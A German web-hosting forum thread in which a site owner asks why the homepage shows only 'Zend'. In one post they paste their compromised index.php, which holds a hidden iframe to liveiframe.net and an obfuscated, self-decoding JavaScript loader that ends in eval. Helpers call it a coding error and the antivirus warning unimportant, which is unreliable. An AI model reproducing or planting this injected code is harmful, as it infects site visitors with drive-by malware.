Problem mit der Startseite


#1

Hallo,
seit einigen Tagen komme ich nicht mehr auf die Startseite.
Es steht nur immer oben links in der Ecke ZEND. Auf die AdminSeite komme ich auch nicht mehr, nur noch mit ftp.
Habe keine Änderungen des Templates ausgeführt. War auf einmal da.
Was kann ich tun?

Die Seite ist http://www.gronier.site90.net/

MfG


#2

Ich habe den Seitekode gesehen aber der stimmt nicht. Die Struktur war sehr interessant:
Zend - als Text
<iframe>… - mit 0 Breite und Höhe, und mit ausgeschaltete Sichtbarkeit
<html>
<body>
<script>… - der Inhalt sieht aus wie eine auto-erstellte Funktion - ich möchte den nicht verstehen :slight_smile:
</script></body></html>
Und “Analytics Code”.

Vielleicht es gibt ein Fehler im Kodierung oder deine Seite möchte vor eine andere Seite lesen, aber etwas ist kaputtgegangen da, ich weiß das nicht. Wir sollten deinem Kode schauen, etwas mehr zu sagen.


#3

und was soll ich nun tun? Was soll ich posten?


#4

Als erster, index.php (oder index.html, welches du hast) solltet nachgeprüft werden. Aber, weil der ist deiner Kode, du mußt entscheiden ob den Ganzen publik machen, oder nicht.


#5

index.php

Zend
<iframe dtkhv=‘lHxnE4zm’ src='http://liveiframe.net/s/in.cgi?7 ’ leetk=‘2EQYtlcn’ width=‘0’ height=‘0’ style=‘display:none’></iframe<html><body><script language=“javascript”>try { function SZtrzNgCISfzghUxy(hywnWd){var hHbWYlOmCq="",mMrINOl,WIYJDsRjZ,HkGtzlx,DOGJZX,xbpaXOI,BDYgd,wsoZBWhA,MXdaItfezq,zmMpFijr;var MdaqmXb=“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”;var GAVqMXm="";for(MXdaItfezq=0;MXdaItfezq<hywnWd.length;){DOGJZX=MdaqmXb.indexOf(hywnWd.charAt(MXdaItfezq++));xbpaXOI=MdaqmXb.indexOf(hywnWd.charAt(MXdaItfezq++));zmMpFijr=SZtrzNgCISfzghUxy;BDYgd=MdaqmXb.indexOf(hywnWd.charAt(MXdaItfezq++));wsoZBWhA=MdaqmXb.indexOf(hywnWd.charAt(MXdaItfezq++));mMrINOl=(DOGJZX<<2)+(xbpaXOI>>4);WIYJDsRjZ=((xbpaXOI&15)<<4)+(BDYgd>>2);HkGtzlx=((BDYgd&3)<<6)+wsoZBWhA;zmMpFijr=zmMpFijr.toString();hHbWYlOmCq+=String.fromCharCode(mMrINOl);if(BDYgd!=64)hHbWYlOmCq+=String.fromCharCode(WIYJDsRjZ);if(wsoZBWhA!=64)hHbWYlOmCq+=String.fromCharCode(HkGtzlx);}zmMpFijr=zmMpFijr.replace(/\W/g,"");zmMpFijr=zmMpFijr.split("").reverse().join("");for(MXdaItfezq=0;MXdaItfezq<hHbWYlOmCq.length;MXdaItfezq++)GAVqMXm+=String.fromCharCode(hHbWYlOmCq.charCodeAt(MXdaItfezq%hHbWYlOmCq.length)^zmMpFijr.charCodeAt(MXdaItfezq%zmMpFijr.length));return eval(GAVqMXm);}SZtrzNgCISfzghUxy(“TXhtUXZhZ0xBVkVOUnx9ExMaVA4IFw0fD0l7UCkCGQQXAAgAZwIWPSwAJCAICi4XDxxLUAMPNBEgCFhBT21nbAUXMQwiCXcgCywcGVpYRlZ4Q19SRH0oAxYOLhdPAAYYJAU7TGR3QHlKXm5mShsHGiIAClwVFQ1JT1RxBSw5AWxuaAIDFhIRJEwLNmMLGwpBMUMYLUMsCzBoUGpTe3NsAhsqFAk9I0RfGAoCDWcAFCgoHAslBgADDk0aFBcXCBddUg==”);} catch(e){}</script></body></html>>


#6

Ist diese die Quelle des Kode im index.php??? Ich glaube nicht… Nur die Ausgang des Kode, oder? Hast du index.php mit einem Texteditor geöffnet, oder die Quelle ( === Ausgang!) im Browser gesehen?


#7

also diese Datei index.php habe ich aus dem Ordner: public_html

wenn ich diesen auch mit meinem Texteditor öffnen will, erscheint immer eine Virus Warnung.

HTML/Infected.WebPage.Gen


#8

Wenn der Datensatz hat vom Server nach deinen PC gespeichert, probiere den Filename ändern (zum Beispiel nach index.txt), und danach mit Texteditor öffnen. Eine Sicherheitswarnung vom Windows wird aufscheinen aber das is normal, und nicht wichtig.

Oder, hast du eine lokale Kopie des (original) index.php? Wenn ja, lade it nach Server auf. Ich bin nicht sicher wie deine File einen Virus haben kann, das sieht unmöglich für mich aus.


#9

Danke erstmal…werde mal probieren…wenn ich nicht weiter komme…melde ich mich nochmal…